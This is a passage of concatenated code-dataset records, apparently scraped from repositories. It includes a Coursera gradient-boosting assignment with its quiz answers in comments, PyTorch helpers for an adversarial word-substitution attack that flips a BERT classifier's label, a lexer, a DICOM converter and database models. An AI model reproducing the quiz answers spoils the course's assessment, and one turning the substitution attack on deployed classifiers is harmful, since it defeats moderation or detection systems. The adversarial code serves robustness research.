method)\nvalidation_data_without_target = validation_data.drop(target,1)\nmodel_5_accuracy = gradient_boosting_classifier.score(validation_data_without_target, validation_data[target])\n\n# 14. Calculate the number of false positives made by the model on the validation_data.\nmodel_5_predicted_valid_data = gradient_boosting_classifier.predict(validation_data_without_target)\nfalse_positive_count = 0\nfalse_negative_count = 0\nfor predict, valid in zip(model_5_predicted_valid_data, validation_data[target]):\n if valid == -1 and predict == +1:\n false_positive_count += 1\n if valid == +1 and predict == -1:\n false_negative_count += 1\n\n# Quiz question: What is the number of false positives on the validation_data?\n# ans = 1653\n\n# 15. Calculate the number of false negatives made by the model on the validation_data.\n# ans = 1491\n\n# Comparison with decision trees\n# ==============================\n\n# In the earlier assignment, we saw that the prediction accuracy of the decision trees was around 0.64. In this assignment, \n# we saw that model_5 has an accuracy of approximately 0.67.\n\n# Here, we quantify the benefit of the extra 3% increase in accuracy of model_5 in comparison with a single decision tree from the original \n# decision tree assignment.\n\n# As we explored in the earlier assignment, we calculated the cost of the mistakes made by the model. We again consider the same costs as follows:\n\n# - False negatives: Assume a cost of $10,000 per false negative.\n# - False positives: Assume a cost of $20,000 per false positive.\n\n# Assume that the number of false positives and false negatives for the learned decision tree was\n\n# - False negatives: 1936\n# - False positives: 1503\n\n# Using the costs defined above and the number of false positives and false negatives for the decision tree, we can calculate the total cost of the mistakes made by the \n# decision tree model as follows:\n# cost = $10,000 * 1936 + $20,000 * 1503 = $49,420,000\n\n# The total cost of the mistakes of the model is $49.42M. That is a lot of money!.\n\n# 16. Calculate the cost of mistakes made by model_5 on the validation_data.\ncost = 10000*1491 + 20000*1653\n\n# Quiz Question: Using the same costs of the false positives and false negatives, what is the cost of the mistakes made by the boosted tree model \n# (model_5) as evaluated on the validation_set?\n# ans = 47970000\n\n# Reminder: Compare the cost of the mistakes made by the boosted trees model with the decision tree model. The extra 3% improvement in prediction \n# accuracy can translate to several million dollars! And, it was so easy to get by simply boosting our decision trees.\n\n# Most positive & negative loans\n# ==============================\n\n# In this section, we will find the loans that are most likely to be predicted safe. We can do this in a few steps:\n\n# - Step 1: Use the model_5 (the model with 5 trees) and make probability predictions for all the loans in validation_data.\n# - Step 2: Similar to what we did in the very first assignment, add the probability predictions as a column called predictions into validation_data.\n# - Step 3: Sort the data (in descreasing order) by the probability predictions.\n\n# 17. Start here with Step 1 & Step 2. Make predictions using model_5 for all examples in the validation_data.\nmodel_5_validation_data_prob_prediction = gradient_boosting_classifier.predict_proba(validation_data_without_target)[:,1]\nvalidation_data['predictions'] = model_5_validation_data_prob_prediction\n# Checkpoint: For each row, the probabilities should be a number in the range [0, 1].\n\n# 18. Now, we are ready to go to Step 3. You can now use the prediction column to sort the loans in validation_data (in descending order) by prediction probability. Find the top 5 loans with the highest probability of being predicted as a safe loan.\nvalidation_data = validation_data.sort_values(['predictions'], ascending=[False])\n\n# Quiz question: What grades are the top 5 loans?\n# ans = grade A\n\n# 19. Repeat this exercise to find the 5 loans (in the validation_data) with the lowest probability of being predicted as a safe loan.\nvalidation_data_safe = validation_data[validation_data['predictions'] > 0.5].sort_values(['predictions'], ascending=[True])\n\n# Effects of adding more trees\n# ============================\n\n# In this assignment, we will train 5 different ensemble classifiers in the form of gradient boosted trees.\n\n# 20. Train models with 10, 50, 100, 200, and 500 trees. Use the n_estimators parameter to control the number of trees. Remember to keep max_depth = 6.\n# Call these models model_10, model_50, model_100, model_200, and model_500, respectively. This may take a few minutes to run.\n# Compare accuracy on entire validation set\ngradient_boosting_classifier_10 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=10) \ngradient_boosting_classifier_10.fit(train_data, train_target)\nmodel_10 = gradient_boosting_classifier_10.predict(validation_data_without_target)\n\ngradient_boosting_classifier_50 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=50) \ngradient_boosting_classifier_50.fit(train_data, train_target)\nmodel_50 = gradient_boosting_classifier_50.predict(validation_data_without_target)\n\ngradient_boosting_classifier_100 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=100) \ngradient_boosting_classifier_100.fit(train_data, train_target)\nmodel_100 = gradient_boosting_classifier_100.predict(validation_data_without_target)\n\ngradient_boosting_classifier_200 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=200) \ngradient_boosting_classifier_200.fit(train_data, train_target)\nmodel_200 = gradient_boosting_classifier_200.predict(validation_data_without_target)\n\ngradient_boosting_classifier_500 = sken.GradientBoostingClassifier(max_depth=6, n_estimators=500) \ngradient_boosting_classifier_500.fit(train_data, train_target)\nmodel_500 = gradient_boosting_classifier_500.predict(validation_data_without_target)\n\n# Now we will compare the predicitve accuracy of our models on the validation set.\n\n# 21. Evaluate the accuracy of the 10, 50, 100, 200, and 500 tree models on the validation_data.\nmodel_10_accuracy = gradient_boosting_classifier_10.score(validation_data_without_target, validation_data[target])\nmodel_50_accuracy = gradient_boosting_classifier_50.score(validation_data_without_target, validation_data[target])\nmodel_100_accuracy = gradient_boosting_classifier_100.score(validation_data_without_target, validation_data[target])\nmodel_200_accuracy = gradient_boosting_classifier_200.score(validation_data_without_target, validation_data[target])\nmodel_500_accuracy = gradient_boosting_classifier_500.score(validation_data_without_target, validation_data[target])\n\n# Quiz Question: Which model has the best accuracy on the validation_data?\n# ans = model_5 or model_10\n\n# Quiz Question: Is it always true that the model with the most trees will perform best on test data?\n# ans = False\n\n# Plot the training and validation error vs. number of trees\n# ==========================================================\n\n# Recall from the lecture that the classification error is defined as\n# classification error = 1 - accuracy\n\n# In this section, we will plot the training and validation errors versus the number of trees to get a sense of how these models are performing. \n# We will compare the 10, 50, 100, 200, and 500 tree models. You will need matplotlib in order to visualize the plots.\n\n# 22. First, make sure this block of code runs on your computer.\nimport matplotlib.pyplot as plt\n# %matplotlib inline\ndef make_figure(dim, title, xlabel, ylabel, legend):\n plt.rcParams['figure.figsize'] = dim\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n if legend is not None:\n plt.legend(loc=legend, prop={'size':15})\n plt.rcParams.update({'font.size': 16})\n plt.tight_layout()\n \n# In order to plot the classification errors (on the train_data and validation_data) versus the number of trees, we will need lists of all \n# the errors.\n\n# Steps to follow:\n\n# - Step 1: Calculate the classification error for each model on the training data (train_data).\n# - Step 2: Store the training errors into a list (called training_errors) that looks like this: [train_err_10, train_err_50, ..., train_err_500]\n# - Step 3: Calculate the classification error of each model on the validation data (validation_data).\n# - Step 4: Store the validation classification error into a list (called validation_errors) that looks like this:[validation_err_10, validation_err_50, ..., validation_err_500]\n\n# Once that has been completed, we will give code that should be able to evaluate correctly and generate the plot.\n# 23. Let us start with Step 1. Write code to compute the classification error on the train_data for models model_10, model_50, model_100, \n# model_200, and model_500.\nmodel_10_train_accuracy = gradient_boosting_classifier_10.score(train_data, train_target)\ntrain_err_10 = commonlib.calc_classification_error(model_10_train_accuracy)\n\nmodel_50_train_accuracy = gradient_boosting_classifier_50.score(train_data, train_target)\ntrain_err_50 = commonlib.calc_classification_error(model_50_train_accuracy)\n\nmodel_100_train_accuracy = gradient_boosting_classifier_100.score(train_data, train_target)\ntrain_err_100 = commonlib.calc_classification_error(model_100_train_accuracy)\n\nmodel_200_train_accuracy = gradient_boosting_classifier_200.score(train_data, train_target)\ntrain_err_200 = commonlib.calc_classification_error(model_200_train_accuracy)\n\nmodel_500_train_accuracy = gradient_boosting_classifier_500.score(train_data, train_target)\ntrain_err_500 = commonlib.calc_classification_error(model_500_train_accuracy)\n\n# 24. Now, let us run Step 2. Save the training errors into a list called training_errors.\ntraining_errors = [train_err_10, train_err_50, train_err_100, train_err_200, train_err_500]\n\n# 27. Now, we will plot the training_errors and validation_errors versus the number of trees. We will compare the 10, 50, 100, 200, \n# and 500 tree models. We provide some plotting code to visualize the plots within this notebook.\n\nvalid_err_10 = commonlib.calc_classification_error(model_10_accuracy)\nvalid_err_50 = commonlib.calc_classification_error(model_50_accuracy)\nvalid_err_100 = commonlib.calc_classification_error(model_100_accuracy)\nvalid_err_200 = commonlib.calc_classification_error(model_200_accuracy)\nvalid_err_500 = commonlib.calc_classification_error(model_500_accuracy)\n\nvalidation_errors = [valid_err_10, valid_err_50, valid_err_100, valid_err_200, valid_err_500]\n\n# 28. Run the following code to visualize the plots.\nplt.plot([10, 50, 100, 200, 500], training_errors, linewidth=4.0, label='Training error')\nplt.plot([10, 50, 100, 200, 500], validation_errors, linewidth=4.0, label='Validation error')\n\nmake_figure(dim=(10,5), \n title='Error vs number of trees',\n xlabel='Number of trees',\n ylabel='Classification error',\n legend='best')\n \n# Quiz question: Does the training error reduce as the number of trees increases?\n# ans = True\n\n# Quiz question: Is it always true that the validation error will reduce as the number of trees increases?\n# ans = False", "sub_path": "python/coursera/ml_classification/week5/assignment1-exploring_ensemble_methods.py", "file_name": "assignment1-exploring_ensemble_methods.py", "file_ext": "py", "file_size_in_byte": 20476, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pandas.read_csv", "line_number": 38, "usage_type": "call"}, {"api_name": "coursera.ml_common.commonlib.MachineLearningCommonLib", "line_number": 114, "usage_type": "call"}, {"api_name": "coursera.ml_common.commonlib", "line_number": 114, "usage_type": "name"}, {"api_name": "pandas.read_json", "line_number": 117, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 118, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 144, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 144, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 277, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 277, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 281, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 281, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 285, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 285, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 289, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 289, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 293, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 293, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 325, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 325, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 326, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 326, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 327, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 327, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 328, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 328, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 330, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 330, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 331, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 331, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 331, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 332, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 332, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 377, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 377, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 378, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 378, "usage_type": "name"}]} {"seq_id": "414695017", "text": "from pprint import pprint\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader, SequentialSampler, TensorDataset\n\nfrom model.tokenizer import get_filtered_k_phrases, filter_unwanted_phrases\n\ndef get_phrase_masked_list(text, sorted_phrase_offsets, sorted_n_words_in_phrase):\n \"\"\"retrieve phrase masked list.\n Args:\n text [str]: original text\n sorted_phrase_offsets List[tuple(start, end), ...]: sorted offsets by importance\n sorted_n_words_in_phrase List[int]: sorted number of words in phrases\n Returns:\n phrase_masked_list: len(phrase_masked_list) == len(sorted_n_words_in_phrase)\n for each phrase in the list, 1 < len(list_of_masked_text) < n_words_in_phrase\n \"\"\"\n phrase_masked_list = []\n # this triple for loop would be super slow\n # TODO: figure a way to optimize it\n for i, (n, (start, end)) in enumerate(zip(sorted_n_words_in_phrase, sorted_phrase_offsets)):\n phrase_masked_list.append([])\n for n_mask in range(1, n+1):\n # make sure there are spaces around it\n mask_text = f\" {' '.join(['[MASK]'] * n_mask)} \"\n phrase_masked_list[i].append(text[:start] + mask_text + text[end:])\n\n return phrase_masked_list\n\n\n# return units masked with UNK at each position in the sequence\ndef get_unk_masked(text, phrase_offsets, filtered_indices):\n masked_units = []\n for i in filtered_indices:\n start, end = phrase_offsets[i]\n masked_units.append(text[:start] + '[UNK]' + text[end:])\n # list of masked basic units\n return masked_units\n\n\ndef get_important_scores(\n masked_phrases,\n tokenizer,\n target_model,\n orig_label,\n max_prob,\n orig_probs,\n device,\n batch_size=1,\n max_length=512\n):\n \"\"\"compute importance scores based on the target model\n This function takes in the tokens from the original text, and the target model,\n and compute the difference with the original probs if each token is masked with [UNK].\n Args:\n text: the original text\n phrase_offsets: a list of tuples indicating the start and end of a phrase.\n filtered_indices: a list of indices \n tokenizer: a BERT tokenizer to be used with the target model.\n target_model: a fine-tuned BERT model for sentiment analysis.\n orig_label: the original label of the text.\n max_prob: the maximum probability from the original probability output.\n orig_probs: the set of original probability outputted from the target model.\n device: the device to move around the tensors and models.\n batch_size: the batch size of the input.\n max_length: the maximum length to keep in the original text.\n Returns:\n import_scores: a torch tensor with dim (len(masked_phrases),)\n \"\"\"\n\n encoded = tokenizer(masked_phrases,\n truncation=True,\n padding='max_length',\n max_length=max_length,\n return_token_type_ids=False,\n return_tensors=\"pt\")\n\n inputs = torch.cat([encoded['input_ids'].unsqueeze(0), encoded['attention_mask'].unsqueeze(0)]).to(device)\n inputs = inputs.permute(1, 0, 2).unsqueeze(2)\n leave_1_logits = [target_model(*data).logits for data in inputs]\n\n # turn into tensor\n leave_1_logits = torch.cat(leave_1_logits, dim=0)\n leave_1_probs = torch.softmax(leave_1_logits, dim=-1) # dim: (len(masked_phrases), num_of_classes)\n leave_1_labels = torch.argmax(leave_1_probs, dim=-1) # dim: len(masked_phrases)\n\n import_scores = (max_prob\n - leave_1_probs[:, orig_label] # how the probability of original label decreases\n +\n (leave_1_labels != orig_label).float() # new label not equal to original label\n *\n (leave_1_probs.max(dim=-1)[0] - torch.index_select(orig_probs, 0, leave_1_labels))\n ) # probability of changed label\n\n return import_scores, leave_1_labels\n\n\ndef get_substitutes(top_k_ids, tokenizer, mlm_model, device):\n \"\"\"get_substitutes find the set of substitution candidates using perplexity.\n Limitation: due to the lack of GPU memory, we set a threshold\n Args:\n top_k_ids: top k ids from the mlm model, tensor (1, n_masks, k)\n tokenizer: Bert Tokenizer\n mlm_model: mlm model\n device: where to transfer the data\n Returns:\n candidates_list: list of list of candidates ranked by perplexity\n \"\"\"\n # all substitutes list of list of token-id (all candidates)\n c_loss = nn.CrossEntropyLoss(reduction='none')\n\n # here we need to get permutation of top k ids\n # because we have no idea what combination fits the most\n\n # assuming first dimension is 1\n #top_k_ids = top_k_ids.squeeze()\n # print(top_k_ids)\n # https://stackoverflow.com/questions/1208118\n meshgrid = [tensor.unsqueeze(0) for tensor in torch.meshgrid(*top_k_ids)]\n ids_comb = torch.cat(meshgrid).T.reshape(-1, len(top_k_ids)).unique(dim=-1) \\\n if len(top_k_ids.shape) != 1 else top_k_ids.unsqueeze(0).T\n # print(ids_comb)\n # print(top_k_ids)\n # print(ids_comb)\n\n # set a threshold\n # TODO: we should select combinations instead of this simple cut\n ids_comb = ids_comb[:24]\n\n # compute perplexity\n N, L = ids_comb.size()\n logits = mlm_model(ids_comb)[0]\n ppl = c_loss(logits.view(N*L, -1), ids_comb.view(-1))\n ppl = torch.exp(torch.mean(ppl.view(N, L), dim=-1))\n\n # sort candidates\n sorted_indices = torch.argsort(ppl)\n sorted_token_ids_list = torch.index_select(ids_comb, 0, sorted_indices).tolist()\n tokens_list = [tokenizer.convert_ids_to_tokens(tokens) for tokens in sorted_token_ids_list]\n # necessary to remove subwords\n candidates_list = [[tokenizer.convert_tokens_to_string([token]) for token in tokens] for tokens in tokens_list]\n\n return candidates_list\n\ndef get_phrase_substitutes(input_ids, attention_mask, mask_token_index, stop_words, tokenizer, mlm_model, device, beam_width=10, K=6):\n # all substitutes list of list of token-id (all candidates)\n c_loss = nn.CrossEntropyLoss(reduction='none')\n\n word_positions = len(mask_token_index)\n query_num = 0\n \n masked_logits = mlm_model(input_ids, attention_mask).logits\n query_num += len(input_ids)\n \n masked_logits = torch.index_select(masked_logits, 1, mask_token_index[0])\n \n # top_ids has a beam_width number of word combinations with smallest perplexities\n # the initial candidates are the beam_width number of words with the highest logits\n top_ids = torch.topk(masked_logits, K, dim=-1).indices[0]\n\n #_, sorted_ids = torch.sort(masked_logits[0,0], dim=-1, descending=True)\n #filtered_ids = get_filtered_k_phrases(sorted_ids, tokenizer, stop_words, K)\n\n #initialize candidates pool with the top k candidates at the first position\n candidate_ids = top_ids.T.to(device)\n \n for p in range(1, word_positions):\n new_inputs = input_ids.repeat(len(candidate_ids), 1)\n new_inputs[:, mask_token_index[:p]] = candidate_ids\n \n masked_logits = mlm_model(new_inputs, attention_mask).logits\n masked_logits = torch.index_select(masked_logits, 1, mask_token_index[p])\n query_num += len(new_inputs)\n \n top_ids = torch.topk(masked_logits, beam_width, dim=-1).indices\n \n repeated_cands = candidate_ids.unsqueeze(1).repeat(1, beam_width, 1).reshape(-1,p)\n repeated_new_cands = top_ids.squeeze().reshape(-1, 1)\n \n # cur_options = (beam_width, beam_width)\n cur_options = torch.cat((repeated_cands, repeated_new_cands), 1)\n \n N, L = cur_options.size()\n logits = mlm_model(cur_options)[0]\n query_num += len(cur_options)\n\n ppl = c_loss(logits.view(N*L, -1), cur_options.view(-1))\n ppl = torch.exp(torch.mean(ppl.view(N, L), dim=-1))\n\n # the smaller the perplexity, the more coherent the sequence is\n sorted_indices = torch.argsort(ppl)[:K]\n candidate_ids = torch.index_select(cur_options, 0, sorted_indices)\n \n sorted_token_ids_list = candidate_ids.tolist()\n tokens_list = [tokenizer.convert_ids_to_tokens(tokens) for tokens in sorted_token_ids_list]\n \n # necessary step to remove subwords\n candidates_list = [[tokenizer.convert_tokens_to_string([token]) for token in tokens] for tokens in tokens_list]\n \n \n return candidates_list, query_num\n\ndef get_word_substitutes(input_ids, attention_mask, mask_token_index, tokenizer, mlm_model, K=8, threshold=3.0):\n masked_logits = mlm_model(input_ids, attention_mask).logits\n masked_logits = torch.index_select(masked_logits, 1, mask_token_index)\n \n top_k_ids = torch.topk(masked_logits, K, dim=-1).indices[0]\n #print(masked_logits.shape)\n #print(top_k_ids.shape)\n #print(mask_token_index)\n substitute_scores = masked_logits[0,0][top_k_ids][0]\n substitute_ids = top_k_ids[0]\n \n words = []\n for (i, score) in zip(substitute_ids, substitute_scores):\n if threshold != 0 and score < threshold:\n break\n words.append([tokenizer._convert_id_to_token(int(i))])\n \n return words\n", "sub_path": "model/substitution.py", "file_name": "substitution.py", "file_ext": "py", "file_size_in_byte": 8847, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "torch.cat", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.meshgrid", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.argsort", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 148, "usage_type": "name"}, {"api_name": "torch.index_select", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.topk", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.topk", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.argsort", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 206, "usage_type": "call"}, {"api_name": "torch.topk", "line_number": 208, "usage_type": "call"}]} {"seq_id": "268227681", "text": "import ply.lex as lex\n\n\ntokens = (\n\t'INTEGER',\n\t'STRING',\n\t'PLUS',\n\t'MINUS',\n\t'TIMES',\n\t'DIVIDE',\n\t'MODULO',\n\t'LPAREN',\n\t'RPAREN',\n)\n\n\nt_PLUS = r'\\+'\nt_MINUS = r'-'\nt_TIMES = r'\\*'\nt_DIVIDE = r'/'\nt_MODULO = r'%'\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\n\nt_ignore = ' \\t\\n\\r'\n\ndef t_INTEGER(t):\n\tr'0|[1-9]\\d*'\n\tt.value = int(t.value)\n\treturn t\n\ndef t_STRING(t):\n\tr\"'(\\.|[^'])*'\"\n\tt.value = str(t.value[1:-1])\n\treturn t\n\ndef t_error(t):\n\tprint('illegal token: \"{}\"'.format(t.value[0]))\n\nlex.lex()\n\n\n", "sub_path": "lexer.py", "file_name": "lexer.py", "file_ext": "py", "file_size_in_byte": 495, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "ply.lex.lex", "line_number": 40, "usage_type": "call"}, {"api_name": "ply.lex", "line_number": 40, "usage_type": "name"}]} {"seq_id": "292851175", "text": "import binascii\nimport io\nimport os\nimport sys\nimport math\n\nimport PIL.Image\nimport pydicom\nimport numpy as np\n\nfrom shutil import copyfile\n\nerr = []\nwalk_dir = os.path.abspath(sys.argv[1])\nout_dirs = []\nfor i in range(2,len(sys.argv)):\n out_dirs.append(os.path.abspath(sys.argv[i]))\nprint('walk_dir (absolute) = ' + os.path.abspath(walk_dir))\nprint('out_dirs (absolute) = ' + str(out_dirs))\n\nfor root, subdirs, files in os.walk(walk_dir):\n print('--\\nroot = ' + root)\n\n for subdir in subdirs:\n print('\\t- subdirectory ' + subdir)\n\n for filename in files:\n file_path = os.path.join(root, filename)\n print('\\t- file %s (full path: %s)' % (filename, file_path))\n if filename.endswith('.dcm'):\n try:\n orig = pydicom.dcmread(file_path)\n pix_arr = orig.pixel_array\n img = PIL.Image.fromarray(pix_arr.astype('uint8'))\n if(img.mode == 'I;16'):\n img.mode = 'I'\n # print(img,orig)\n img = img.point(lambda i:i*(1./4)).convert('L')\n for out in out_dirs:\n fold = os.path.join(out,subdir)\n if not os.path.isdir(fold):\n os.mkdir(fold)\n pat = os.path.join(fold,filename)\n img.save(pat[:-4] + '.jpg')\n print('\\t- saved file ' + filename[:-4] + '.jpg' +\n ' (full path: ' + pat[:-4] + '.jpg' + ')')\n except NotImplementedError as e:\n print('\\t- ERROR: ' + str(e))\n err.append(str(e))\n pass\n elif filename.endswith('.jpg') or filename.endswith('jpeg'):\n for out in out_dirs:\n fold = os.path.join(out,subdir)\n if not os.path.isdir(fold):\n os.mkdir(fold)\n pat = os.path.join(fold,filename)\n copyfile(file_path,pat[:-4] + '.jpg')\n print('\\t- saved file ' + filename[:-4] + '.jpg' +\n ' (full path: ' + pat[:-4] + '.jpg' + ')')\n\nif len(err) > 0: print(err)\n", "sub_path": "dcm-jpg.py", "file_name": "dcm-jpg.py", "file_ext": "py", "file_size_in_byte": 2144, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.abspath", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pydicom.dcmread", "line_number": 32, "usage_type": "call"}, {"api_name": "PIL.Image.Image.fromarray", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.Image.Image", "line_number": 34, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 57, "usage_type": "call"}]} {"seq_id": "514537298", "text": "#!/usr/bin/env python3\n\nfrom sqlalchemy.orm import validates\nfrom sqlalchemy import Column, Integer, String\nfrom database import Base\n\n\nclass Property(Base):\n __tablename__ = \"properties\"\n id = Column(Integer, primary_key=True)\n x = Column(Integer)\n y = Column(Integer)\n beds = Column(Integer)\n baths = Column(Integer)\n squareMeters = Column(Integer)\n\n def __init__(self, x=None, y=None, beds=None, baths=None, squareMeters=None):\n self.x = x\n self.y = y\n self.beds = beds\n self.baths = baths\n self.squareMeters = squareMeters\n\n def __repr__(self):\n return \"\" % (self.id)\n\n @validates(\"x\")\n def validate_x(self, key, value):\n if 0 <= int(value) and int(value) <= 1400:\n return value\n\n raise ValueError()\n\n @validates(\"y\")\n def validate_y(self, key, value):\n if 0 <= int(value) and int(value) <= 1000:\n return value\n\n raise ValueError()\n\n @validates(\"beds\")\n def validate_beds(self, key, value):\n if 1 <= int(value) and int(value) <= 5:\n return value\n\n raise ValueError()\n\n @validates(\"baths\")\n def validate_baths(self, key, value):\n if 1 <= int(value) and int(value) <= 4:\n return value\n\n raise ValueError()\n\n @validates(\"squareMeters\")\n def validate_square_meters(self, key, value):\n if 20 <= int(value) and int(value) <= 240:\n return value\n\n raise ValueError()\n\n\nclass Province(Base):\n __tablename__ = \"provinces\"\n id = Column(Integer, primary_key=True)\n name = Column(String(30))\n ax = Column(Integer)\n ay = Column(Integer)\n bx = Column(Integer)\n by = Column(Integer)\n\n def __init__(self, name=None, ax=None, ay=None, bx=None, by=None):\n self.name = name\n self.ax = ax\n self.ay = ay\n self.bx = bx\n self.by = by\n\n def __repr__(self):\n return \"\" % (self.id, self.name)\n", "sub_path": "models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1992, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "database.Base", "line_number": 8, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 10, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 11, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 11, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 12, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 13, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 13, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 14, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 15, "usage_type": "argument"}, {"api_name": "sqlalchemy.orm.validates", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.validates", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.validates", "line_number": 41, "usage_type": "call"}, {"api_name": 